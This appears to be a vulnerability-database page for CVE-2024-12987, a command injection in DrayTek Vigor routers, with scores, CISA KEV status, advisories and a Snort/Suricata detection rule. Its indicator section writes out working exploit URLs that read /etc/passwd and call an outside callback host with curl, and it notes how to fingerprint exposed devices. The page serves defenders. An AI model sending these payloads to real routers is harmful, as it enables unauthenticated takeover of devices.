CVE-2024-12987
published 2024-12-27CVE-2024-12987: A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-06-05
Exploited in the wild
EPSS
98.13%
99.9th percentile
A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component Web Management Interface. The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| draytek | vigor2960 | — | — |
| draytek | vigor2960_firmware | — | — |
| draytek | vigor300b | — | — |
| draytek | vigor300b_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccat${IFS}/etc/passwd
url/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccurl${IFS}{{interactsh-url}}
bytes
|b4 25 35 32 24 63 25 35 32 24 63|
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/mainfunction.cgi/apmcfgupload"; fast_pattern; content:"session|3d|"; content:"|b4 25 35 32 24 63 25 35 32 24 63|"; distance:0; reference:url,nvd.nist.gov/vuln/detail/CVE-2024-12987; reference:cve,2024-12987; classtype:web-application-attack; sid:2059890; rev:1; metadata:affected_product DrayTek, attack_target Server, tls_state TLSDecrypt, created_at 2025_02_05, cve CVE_2024_12987, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_02_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- →Exploit targets the `session` parameter in a GET request to `/cgi-bin/mainfunction.cgi/apmcfgupload`; injection uses `%52$c%52$c` (printf-style format string) to insert newlines/special chars, followed by shell commands using `${IFS}` as a space substitute.
- →Snort/Suricata SID 2059890 detects the attack by matching GET requests to the vulnerable URI combined with the byte sequence `|b4 25 35 32 24 63 25 35 32 24 63|` following `session=` in the URI.
- →Vulnerable DrayTek devices can be fingerprinted via FOFA using the query targeting the DWS server header and specific JavaScript/language markers.
- →Successful exploitation response contains `root:.*:0:0:` in the body (passwd file output) and the `DWS` server header with HTTP 200 status.
- →Out-of-band (OOB) detection: a second exploit variant issues a `curl` to an external callback URL via the same injection vector; DNS interaction confirms blind RCE.
- ·The vulnerability is unauthenticated (PR:N) and exploitable remotely with no user interaction; the web management interface should not be exposed to the internet.
- ·Snort rule metadata specifies `tls_state TLSDecrypt` and `deployment SSLDecrypt`, meaning TLS-encrypted management traffic must be decrypted for the signature to fire.
- ·Affected firmware versions are Vigor2960, Vigor300B, and Vigor3900 running ≤1.5.1.4; version 1.5.1.5 patches the issue. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.06.9MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck6.9MEDIUM
cisa6.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
DrayTek Vigor Routers OS Command Injection Vulnerability
cisa·2025-05-15·CVSS 6.9
CVE-2024-12987 [MEDIUM] CWE-78 DrayTek Vigor Routers OS Command Injection Vulnerability
Vulnerability: DrayTek Vigor Routers OS Command Injection Vulnerability
Affected: DrayTek Vigor Routers
DrayTek Vigor2960, Vigor300B, and Vigor3900 routers contain an OS command injection vulnerability due to an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component web management interface.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://fw.draytek.com.tw/Vigor2960/Firmware/v1.5.1.5/DrayTek_Vigor2960_V1.5.1.5_01release-note.pdf ; https://fw.draytek.com.tw/Vigor300B/Firmware/v1.5.1.5/DrayTek_Vigor300B_V1.5.1.5_01release-note.pdf ; https://fw.draytek.com.tw/Vigor3900/Firmware/v1.5.1.5/DrayTek_Vigor3900_V1.5.1.5
GHSA
GHSA-3mp3-6fg3-7hxj: A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1
ghsa_unreviewed·2024-12-27
CVE-2024-12987 [MEDIUM] CWE-77 GHSA-3mp3-6fg3-7hxj: A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1
A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component Web Management Interface. The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component.
VulnCheck
DrayTek Vigor Routers OS Command Injection Vulnerability
vulncheck·2024·CVSS 6.9
CVE-2024-12987 [MEDIUM] CWE-78 DrayTek Vigor Routers OS Command Injection Vulnerability
DrayTek Vigor Routers OS Command Injection Vulnerability
DrayTek Vigor2960, Vigor300B, and Vigor3900 routers contain an OS command injection vulnerability due to an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component web management interface.
Affected: DrayTek Vigor Routers
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-12&host_type=src&vulnerability=cve-2024-12987; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-17&host_type=src&vulnerability=cve-2024-12987; https://dashbo
Suricata
ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)
suricata·2025-02-05·CVSS 6.9
CVE-2024-12987 [MEDIUM] ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)
ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/mainfunction.cgi/apmcfgupload"; fast_pattern; content:"session|3d|"; content:"|b4 25 35 32 24 63 25 35 32 24 63|"; distance:0; reference:url,nvd.nist.gov/vuln/detail/CVE-2024-12987; reference:cve,2024-12987; classtype:web-application-attack; sid:2059890; rev:1; metadata:affected_product DrayTek, attack_target Server, tls_state TLSDecrypt, created_at 2025_02_05, cve CVE_2024_12987, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confi
Nuclei
DrayTek Vigor - Command Injection
nuclei·CVSS 6.9
CVE-2024-12987 [MEDIUM] DrayTek Vigor - Command Injection
DrayTek Vigor - Command Injection
DrayTek Gateway devices (Vigor2960, Vigor300B, etc.) are vulnerable to command injection via the session parameter in the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint. An attacker can inject arbitrary commands and retrieve their output.
Template:
id: CVE-2024-12987
info:
name: DrayTek Vigor - Command Injection
author: ritikchaddha
severity: critical
description: |
DrayTek Gateway devices (Vigor2960, Vigor300B, etc.) are vulnerable to command injection via the session parameter in the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint. An attacker can inject arbitrary commands and retrieve their output.
impact: |
Unauthenticated attackers can inject arbitrary system commands through the session parameter in the apmcfgupload endpoint to execute commands
https://netsecfish.notion.site/Command-Injection-in-apmcfgupload-endpoint-for-DrayTek-Gateway-Devices-1676b683e67c8040b7f1f0ffe29ce18f?pvs=4https://vuldb.com/?ctiid.289380https://vuldb.com/?id.289380https://vuldb.com/?submit.468795https://fw.draytek.com.tw/Vigor2960/Firmware/v1.5.1.5/DrayTek_Vigor2960_V1.5.1.5_01release-note.pdfhttps://fw.draytek.com.tw/Vigor300B/Firmware/v1.5.1.5/DrayTek_Vigor300B_V1.5.1.5_01release-note.pdfhttps://fw.draytek.com.tw/Vigor3900/Firmware/v1.5.1.5/DrayTek_Vigor3900_V1.5.1.5_01release-note.pdfhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-12987
2024-12-27
Published
2025-05-15
Added to CISA KEV
Exploited in the wild